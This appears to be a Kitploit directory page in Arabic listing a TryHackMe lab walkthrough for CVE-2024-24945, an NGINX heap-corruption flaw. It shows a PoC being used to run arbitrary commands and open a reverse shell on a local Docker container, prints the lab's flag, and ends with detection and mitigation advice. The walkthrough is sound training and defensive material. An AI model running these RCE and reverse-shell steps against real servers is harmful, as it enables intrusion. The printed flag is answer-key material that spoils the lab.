Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough — يُظهر هذا المختبر استغلال ثغرة CVE-2024-24945، وهي ثغرة تلف في الكومة (heap corruption) تؤثر على NGINX. كان الهدف هو فهم كيف يمكن أن يؤدي تلف الذاكرة إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) واكتساب خبرة عملية في تقنيات الاستغلال والكشف والتخفيف. | Kitploit
أدوات/GitHubGitHub/benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليماستغلال الملفات الثنائيةمختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough

CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough

يُظهر هذا المختبر استغلال ثغرة CVE-2024-24945، وهي ثغرة تلف في الكومة (heap corruption) تؤثر على NGINX. كان الهدف هو فهم كيف يمكن أن يؤدي تلف الذاكرة إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) واكتساب خبرة عملية في تقنيات الاستغلال والكشف والتخفيف.

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

CVE-2024-24945-NGINX-RIFT---دليل مختبر TryHackMe

يشرح هذا المختبر استغلال ثغرة CVE-2024-24945، وهي ثغرة تلف في الكومة (heap corruption) تؤثر على NGINX. كان الهدف هو فهم كيف يمكن أن يؤدي تلف الذاكرة إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) واكتساب خبرة عملية في تقنيات الاستغلال والكشف والتخفيف.

الأهداف

. التحقق من خدمة NGINX الضعيفة. . تنفيذ أوامر عشوائية باستخدام إثبات المفهوم (PoC) المقدم. . الحصول على شل عكسي (reverse shell) على الحاوية المستهدفة. . استرداد علم التحدي (flag). . فهم استراتيجيات الكشف والتخفيف.

بيئة المختبر

. المنصة: TryHackMe . الخدمة المستهدفة: NGINX RIFT . البيئة المحتواة: Docker . أداة الاستغلال: poc.py . طريقة الوصول: VNC (الحوسبة الشبكية الافتراضية)

المنهجية

  1. التحقق من الخدمة

  2. تم التأكد من أن الحاوية الضعيفة قيد التشغيل ويمكن الوصول إليها.

  3. root@kitploit:~
    sudo docker ps
    curl -s http://127.0.0.1:19321/api/users/42
    

backend ok

  1. تنفيذ التعليمات البرمجية عن بُعد

تم تنفيذ إثبات المفهوم (PoC) المقدم للتحقق من تنفيذ الأوامر العشوائية.

root@kitploit:~
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned

تم التحقق من التنفيذ الناجح:

root@kitploit:~
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned

المخرجات: hello from depthfirst

الوصول عبر الشل العكسي

إنشاء شل تفاعلي على الحاوية المستهدفة.

root@kitploit:~
python3 poc.py --shell

اتصال ناجح:

[] listening for reverse shell on port 1337... [] connected. $

  1. استرداد العلم

تم الوصول إلى علم التحدي.

root@kitploit:~
cat /flag.txt

العلم:

THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}

فرص الكشف

يمكن للمدافعين تحديد محاولات الاستغلال من خلال:

. تعطل عمليات NGINX العاملة . أحداث خطأ التقسيم (Segmentation fault) . اتصالات شبكة صادرة غير متوقعة . عمليات شل مشبوهة (/bin/sh, bash) . إنشاء ملفات غير مصرح به في الأدلة المؤقتة

استراتيجيات التخفيف

. الترقية إلى إصدار NGINX مصحح. . تطبيق مبدأ الحد الأدنى من الامتيازات (least privilege). . تقييد حركة مرور الشبكة الصادرة غير الضرورية. . تنفيذ مراقبة مستمرة للسجلات. . استخدام ضوابط أمان الحاويات ومراقبة وقت التشغيل.

النقاط الرئيسية المستفادة

قدم هذا المختبر خبرة عملية في:

. فهم ثغرات تلف الكومة. . استغلال عيوب تنفيذ التعليمات البرمجية عن بُعد. . إنشاء شلات عكسية. . إجراء التحقق بعد الاستغلال. . التعرف على مؤشرات الاختراق وتقنيات التخفيف.

إخلاء المسؤولية

تم تنفيذ هذا التمرين في بيئة مختبر TryHackMe خاضعة للرقابة لأغراض تعليمية ودفاعية في مجال الأمن السيبراني فقط.

المؤلف: [Benedict Ejepu Amaechi] المنصة: TryHackMe الموضوع: CVE-2024-24945 9NGINX RIFT0 الاستغلال والدفاع تاريخ الإكمال: يونيو 2026

تنزيل الأداة